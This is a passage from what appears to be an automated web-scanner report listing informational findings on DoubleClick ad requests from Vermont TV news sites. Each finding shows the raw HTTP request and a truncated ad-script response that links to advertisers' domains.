Path:   /adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/detail

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/detail;kw=linkswelike;sz=88x31;pagepos=1;pos=3;tile=3;ord=6842573? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:30:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1489

document.write('<!-- Template ID = 14863 Template Name = Links We Like -->\n');

   e=document.getElementById("ib_div_pos1_3");
   e.innerHTML='<div class="ib_title" id="ib_title"><a href="http://ad.doubl
...[SNIP]...
ae4/3/0/%2a/c%3B233962719%3B1-0%3B14%3B58015214%3B21-88/31%3B41433534/41451321/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3fhttp://degrees.classesusa.com/schools/?sourceid=lmb-22135-42819" target="_blank"><img height="60" border="0" width="80" align="left" src="http://s0.2mdn.net/2974161/Go-Back-To-School-With-A-Grant-1.jpg"></a>
...[SNIP]...
10.82. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/detail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/detail

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/detail;kw=linkswelike;sz=88x31;pagepos=1;pos=1;tile=1;ord=6842573? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:30:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1725

document.write('<!-- Template ID = 14863 Template Name = Links We Like -->\n');

   e=document.getElementById("ib_div_pos1_1");
   e.innerHTML='<div class="ib_title" id="ib_title"><a href="http://ad.doubl
...[SNIP]...
%3D2/0/ff/0%3B%7Esscs%3D%3fhttp://clk.redcated/MON/go/194932434/direct/01/?href=http://career-advice.monster.com/in-the-office/work-life-balance/excuses-for-missing-work/article.aspx" target="_blank"><img height="60" border="0" width="80" align="left" src="http://s0.2mdn.net/2977167/10_Excuses_For_Missing_Work.jpg"></a>
...[SNIP]...
10.83. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/index

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/index;kw=linkswelike;sz=88x31;pagepos=1;pos=3;tile=3;ord=6792464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:30:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1489

document.write('<!-- Template ID = 14863 Template Name = Links We Like -->\n');

   e=document.getElementById("ib_div_pos1_3");
   e.innerHTML='<div class="ib_title" id="ib_title"><a href="http://ad.doubl
...[SNIP]...
ae4/3/0/%2a/t%3B233962719%3B0-0%3B14%3B57906024%3B21-88/31%3B39687904/39705691/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3fhttp://degrees.classesusa.com/schools/?sourceid=lmb-22697-43595" target="_blank"><img height="60" border="0" width="80" align="left" src="http://s0.2mdn.net/2974161/Go-Back-To-School-With-A-Grant-2.jpg"></a>
...[SNIP]...
10.84. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/index

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/index;kw=linkswelike;sz=88x31;pagepos=1;pos=2;tile=2;ord=6792464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:30:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1514

document.write('<!-- Template ID = 14863 Template Name = Links We Like -->\n');

   e=document.getElementById("ib_div_pos1_2");
   e.innerHTML='<div class="ib_title" id="ib_title"><a href="http://ad.doubl
...[SNIP]...
%3B233962674%3B0-0%3B3%3B57906024%3B21-88/31%3B39164296/39182083/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3fhttps://www.lowermybills.com/lending/home-refinance/?sourceid=lmb-21372-41812" target="_blank"><img height="60" border="0" width="80" align="left" src="http://s0.2mdn.net/2974161/Mortgage-APRs-Hit-3.25.JPG"></a>
...[SNIP]...
10.85. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/index

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/index;kw=linkswelike;sz=88x31;pagepos=1;pos=1;tile=1;ord=6792464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:30:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1785

document.write('<!-- Template ID = 14863 Template Name = Links We Like -->\n');

   e=document.getElementById("ib_div_pos1_1");
   e.innerHTML='<div class="ib_title" id="ib_title"><a href="http://ad.doubl
...[SNIP]...
0/ff/0%3B%7Esscs%3D%3fhttp://clk.redcated/MON/go/194932434/direct/01/?href=http://career-advice.monster.com/in-the-office/workplace-issues/things-not-to-say-to-your-boss/article.aspx" target="_blank"><img height="60" border="0" width="80" align="left" src="http://s0.2mdn.net/2977167/What_Not_To_Tell_The_Boss.jpg"></a>
...[SNIP]...
10.86. http://ad.doubleclick.net/adj/ibs.pla.homepage/local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.homepage/local

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/ibs.pla.homepage/local;kw=homepage+square2;comp=false;ad=true;pgtype=index;tile=3;sz=300x250;ord=1302353591857? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:53:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 504

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/w;239298330;2-0;0;12662198;4307-300/250;41489268/41507055/1;;~okv=;kw=homepage square2;comp=false;ad=true;pgtype=index;tile=3;sz=300x250;~aopt=2/2/2670/0;~sscs=%3fhttp://learn.uvm.edu/?utm_source=WPTZ&utm_medium=online&utm_content=300-250&utm_campaign=env"><img src="http://images.ibsys.com/sh/sponsors/99703/pla-uvmcontinuinged-300x250-99703-03302011-832.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.87. http://ad.doubleclick.net/adj/ibs.pla.homepage/local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.homepage/local

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/ibs.pla.homepage/local;kw=homepage+banner1;comp=false;ad=true;dcopt=ist;pgtype=index;tile=1;sz=728x90;ord=1302352178986? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:29:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 510

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/s;239298326;2-0;0;12662198;3454-728/90;41489161/41506948/1;;~okv=;kw=homepage banner1;comp=false;ad=true;dcopt=ist;pgtype=index;tile=1;sz=728x90;~aopt=2/2/2670/0;~sscs=%3fhttp://learn.uvm.edu/?utm_source=WPTZ&utm_medium=online&utm_content=728-90&utm_campaign=env"><img src="http://images.ibsys.com/sh/sponsors/99703/pla-uvmcontinuinged-728x90-99703-03302011-314.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.88. http://ad.doubleclick.net/adj/ibs.pla.homepage/local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.homepage/local

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/ibs.pla.homepage/local;kw=homepage+banner1;comp=false;ad=true;dcopt=ist;pgtype=index;tile=1;sz=728x90;ord=1302352378468? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:33:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 515

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/t;238193711;0-0;0;12662198;3454-728/90;41302796/41320583/1;;~okv=;kw=homepage banner1;comp=false;ad=true;dcopt=ist;pgtype=index;tile=1;sz=728x90;~aopt=2/2/2670/0;~sscs=%3fhttp://www.spherion.com/corporate/officelocator/officedetails.jsp?office_id=4232&contentpage=home"><img src="http://images.ibsys.com/sh/sponsors/99060/pla-spherionstaffi-728x90-99060-03232011-402.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.89. http://ad.doubleclick.net/adj/ibs.pla.homepage/local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.homepage/local

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/ibs.pla.homepage/local;kw=homepage+banner1;comp=false;ad=true;dcopt=ist;pgtype=index;tile=1;sz=728x90;ord=1302353591857? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:53:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 510

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/m;239298326;1-0;0;12662198;3454-728/90;41489046/41506833/1;;~okv=;kw=homepage banner1;comp=false;ad=true;dcopt=ist;pgtype=index;tile=1;sz=728x90;~aopt=2/2/2670/0;~sscs=%3fhttp://learn.uvm.edu/?utm_source=WPTZ&utm_medium=online&utm_content=728-90&utm_campaign=biz"><img src="http://images.ibsys.com/sh/sponsors/99703/pla-uvmcontinuinged-728x90-99703-03302011-971.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.90. http://ad.doubleclick.net/adj/ibs.pla.homepage/local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.homepage/local

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/ibs.pla.homepage/local;kw=homepage+square2;comp=false;ad=true;pgtype=index;tile=3;sz=300x250;ord=1302356019556? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 13:33:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 459

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/q;236647127;0-0;0;12662198;4307-300/250;40847121/40864908/1;;~okv=;kw=homepage square2;comp=false;ad=true;pgtype=index;tile=3;sz=300x250;~aopt=2/2/2670/0;~sscs=%3fhttp://www.getenergysmart.org/home-performance/"><img src="http://images.ibsys.com/sh/sponsors/98010/pla-nystateenergyre-300x250-98010-02162011-886.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.91. http://ad.doubleclick.net/adj/ibs.pla.homepage/local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.homepage/local

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/ibs.pla.homepage/local;kw=homepage+square2;comp=false;ad=true;pgtype=index;tile=3;sz=300x250;ord=1302352178986? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:29:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 507

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/g;239298330;1-0;0;12662198;4307-300/250;41489175/41506962/1;;~okv=;kw=homepage square2;comp=false;ad=true;pgtype=index;tile=3;sz=300x250;~aopt=2/2/2670/0;~sscs=%3fhttp://learn.uvm.edu/?utm_source=WPTZ&utm_medium=online&utm_content=300-250&utm_campaign=health"><img src="http://images.ibsys.com/sh/sponsors/99703/pla-uvmcontinuinged-300x250-99703-03302011-213.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.92. http://ad.doubleclick.net/adj/ibs.pla.homepage/local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.homepage/local

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/ibs.pla.homepage/local;kw=homepage+titlebar1+21115717;comp=false;ad=true;pgtype=index;tile=2;sz=100x34;ord=1302352178986? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:29:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 349

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/r;44306;0-0;0;12662198;8270-100/34;0/0/0;;~okv=;kw=homepage titlebar1 21115717;comp=false;ad=true;pgtype=index;tile=2;sz=100x34;~aopt=2/2/2670/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.93. http://ad.doubleclick.net/adj/ibs.pla.homepage/local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.homepage/local

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/ibs.pla.homepage/local;kw=homepage+banner1;comp=false;ad=true;dcopt=ist;pgtype=index;tile=1;sz=728x90;ord=1302356019556? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 13:33:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 466

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/u;236647124;0-0;0;12662198;3454-728/90;40847139/40864926/1;;~okv=;kw=homepage banner1;comp=false;ad=true;dcopt=ist;pgtype=index;tile=1;sz=728x90;~aopt=2/2/2670/0;~sscs=%3fhttp://www.getenergysmart.org/home-performance/"><img src="http://images.ibsys.com/sh/sponsors/98010/pla-nystateenergyre-728x90-98010-02162011-897.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.94. http://ad.doubleclick.net/adj/ibs.pla.news/local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.news/local

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/ibs.pla.news/local;kw=news+banner1+27483035;comp=false;ad=true;pgtype=detail;tile=1;sz=728x90;ord=1302352233547? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:30:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 451

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/o;238193711;1-0;0;12657116;3454-728/90;41550499/41568286/1;;~okv=;kw=news banner1 27483035;comp=false;ad=true;pgtype=detail;tile=1;sz=728x90;~aopt=2/2/2678/0;~sscs=%3fhttp://www.spherion.com/burlington-vt"><img src="http://images.ibsys.com/sh/sponsors/99060/pla-spherionstaffi-728x90-99060-04042011-639.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.95. http://ad.doubleclick.net/adj/ibs.pla.news/local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.news/local

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/ibs.pla.news/local;kw=news+square;comp=false;ad=true;pgtype=index;tile=4;sz=300x250;ord=1302352191217? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:30:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 443

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/b;235358941;0-0;0;12657116;4307-300/250;40391391/40409178/1;;~okv=;kw=news square;comp=false;ad=true;pgtype=index;tile=4;sz=300x250;~aopt=2/2/2678/0;~sscs=%3fhttp://adamsglassllc.com/products.html"><img src="http://images.ibsys.com/sh/sponsors/96884/pla-adamsglassllc-300x250-96884-01212011-739.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.96. http://ad.doubleclick.net/adj/ibs.pla.news/local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.news/local

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/ibs.pla.news/local;kw=news+titlebar1+21150522;comp=false;ad=true;pgtype=index;tile=2;sz=100x34;ord=1302352191217? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:29:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 345

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/c;44306;0-0;0;12657116;8270-100/34;0/0/0;;~okv=;kw=news titlebar1 21150522;comp=false;ad=true;pgtype=index;tile=2;sz=100x34;~aopt=2/2/2678/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.97. http://ad.doubleclick.net/adj/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.wcax/community

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/wn.loc.wcax/community;sz=300x75;wnsz=44;tile=2;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;apptype=platform;env=production;ord=49374599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:34:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 243

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/e;44306;0-0;0;29116597;896-300/75;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.98. http://ad.doubleclick.net/adj/wn.loc.wcax/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.wcax/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/wn.loc.wcax/homepage;sz=300x75;wnsz=44;tile=2;wncc=Homepage;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;apptype=platform;env=production;ord=89441616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
